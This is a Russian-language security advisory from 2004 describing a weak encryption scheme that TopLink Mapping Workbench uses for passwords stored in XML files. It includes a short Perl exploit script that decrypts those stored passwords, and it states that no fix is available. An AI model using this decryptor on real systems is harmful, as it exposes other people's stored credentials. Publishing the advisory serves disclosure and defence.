Слабый алгоритм Шифрования в OracleAS TopLink Mapping Workbench

Дата публикации:
03.02.2004
Всего просмотров:
1065
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: OracleAS TopLink

Описание: Уязвимость обнаружена в OracleAS TopLink Mapping Workbench. Локальный пользователь может расшифровать пароли, хранящиеся в XML файлах.

Сообщается, что OracleAS TopLink Mapping Workbench использует слабый алгоритм шифрования для хранения паролей в XML файлах. Локальный пользователь может расшифровать зашифрованные пароли.

Пример/Эксплоит:

#!/usr/bin/perl
#Decrypt Oracle Toplink Mapping WorkBench passwords.
#Author: Martin

$string = "A7FCAA504BA7E4FC";

sub usage {
	print " Usage: $0 <password to decrypt>\n";
	}

if ($#ARGV != 0) {
	usage();
	}

else {  
	$encrypted = $ARGV[0];
	$encrypted =~ s/$string/ /;
	$chars = length($encrypted);
	$enc2 = substr($encrypted,0,2);	
	$encrypted = substr($encrypted,2,length($encrypted));
	$i = 0;
	while (($chars / 2) >= $i + 1) {
		print $i;
		$int = hex($enc2);
		if (($i%2) == 1) { $result .= chr($int - ( ($i + 1 )/3 ) - 112); }
		else {  $result .= chr($int - 4 + $i); }		
		$enc2 = substr($encrypted,0,length($encrypted) - 1);
        	$encrypted = substr($encrypted,2,length($encrypted));
		$i++;	
		}
	print "$result\n";	
	}

URL производителя: http://www.oracle.com

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Oracle toplink mapping workbench password algorithm

или введите имя

CAPTCHA